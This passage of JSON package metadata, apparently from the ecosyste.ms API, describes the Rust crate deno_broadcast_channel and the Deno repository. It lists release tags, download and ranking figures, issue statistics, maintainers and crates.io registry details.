hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T06:42:24.263Z","dependent_packages_count":11,"downloads":594294,"downloads_period":"total","dependent_repos_count":31,"rankings":{"downloads":5.215714413848776,"dependent_repos_count":5.108702968297772,"dependent_packages_count":3.249594268149489,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.4012758890693484},"purl":"pkg:cargo/deno_broadcast_channel","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_broadcast_channel","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_broadcast_channel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_broadcast_channel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:20.709Z","updated_at":"2022-11-07T18:29:20.709Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.731Z","updated_at":"2023-07-18T22:41:23.731Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}}]